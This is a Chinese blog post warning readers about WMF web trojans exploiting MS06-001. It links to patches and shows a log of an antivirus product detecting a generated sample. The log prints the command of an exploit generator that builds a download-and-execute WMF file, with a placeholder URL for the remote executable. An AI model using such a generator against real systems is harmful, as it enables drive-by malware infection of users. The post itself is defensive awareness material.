春节已经到眼前了,大家假期上网要小心WMF木马哦。这类木马已经有开始蔓延的趋势了。WMF木马相关资料,请参考下面文章:
MS06-001提前发布 修补WMF 0day漏洞
Exploit.WMF.SetAbortProc
WMF 0-day漏洞进一步研究
QQ尾巴也关注WMF漏洞
“模特在线”被放WMF网页木马
保剑锋官方网站论坛被放WMF网页木马
WMF网页木马生成器将成为黑客的新宠
要想不中毒,请安装WMF漏洞补丁:
官方补丁:http://www.microsoft.com/china/technet/Security/bulletin/ms06-001.mspx
第三方补丁:http://www.hexblog.com/2005/12/wmf_vuln.html
或者升级你的反病毒软件,上网时开启实时监控。目前,大多数AV都可以检测这些WMF木马(点击这里查看KV的测试结果)。
----------- cut here------------f:\wmf_maker>ms0601 http://xxx.xxx.xxx.xxx/xxx.exe Microsoft Windows WMF Download and Exec Exploit ----------------------------------------------- based on wmf_exp.wmf, shellcode from thc shellc0de@2006 Compiled by www.yibujh.com[+] Using URL: http://xxx.xxx.xxx.xxx/xxx.exe[+] Opening exploit.wmf: Ok![+] Writing Header: Ok![+] Writing Shellcode: Ok![+] Writing Nops: Ok![+] Writing Footer: Ok![+] Done!f:\wmf_maker>kv exploit.wmfKVD3000 32bit version 9.000A, (c) Jiangmin, inc, 1998-2004Load kvlb\KVA.VLB....Load kvlb\kvb.vlb...Load kvlb\kvc.vlb...Load kvlb\kvd.vlb...Load kvlb\kve.vlb...Load kvlb\kvf.vlb...Load kvlb\kvg.vlb...Load kvlb\kvh.vlb...Load kvlb\kvi.vlb...Load kvlb\kvj.vlb...Load kvlb\KVK.VLB...Load kvlb\kvl.vlb...Load kvm.vlb...Load kvlb\kvn.vlb...f:\wmf_maker\exploit.wmf found: Exploit.WMF.SetAbortProcTotal 1 files scaned.Total 1 virus bodies found, 1 virus varieties, 0 warningTotal 0 exepack inspected, 0 files extracted from 0 compressed files.Scan time: 0:00:00----------- cut here------------
本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”
Trackback: http://tb.donews.net/TrackBack.aspx?PostId=708687